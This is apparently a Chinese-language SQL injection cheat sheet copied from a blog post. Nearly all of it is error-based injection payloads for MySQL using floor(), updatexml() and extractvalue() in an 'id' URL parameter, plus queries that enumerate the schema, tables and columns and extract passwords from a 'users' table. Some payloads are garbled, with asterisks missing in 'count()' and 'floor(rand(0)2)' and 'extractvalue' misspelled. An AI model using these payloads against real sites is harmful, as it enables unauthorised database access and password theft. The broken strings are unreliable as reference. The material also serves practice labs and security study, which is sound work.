(1).floor()报错
语句:
?id=1‘ union select 1,count(),concat(payload,floor(rand(0)2))x from information_schema.columns group by x --+
(2).updatexml()报错
语句:
?id=1%27 and updatexml(1,concat(0x26,payload,0x26),1);---+
(3).exvalue()报错
?id=1′ and extractvalue(1,concat(0x26,database(),0x26));--+
注:这些函数都只能爆出32位字符
1.查数据库:database()
2.查表(要加括号):select table_name from information_schema.tables where table_schema=‘security‘ limit 3,1
3.列:select column_name from information_schema.columns where table_schema=‘security‘ and table_name=‘users‘ limit 1,1
4.字段:select password from users limit 0,1
原文:https://www.cnblogs.com/everythingispossible/p/14622695.html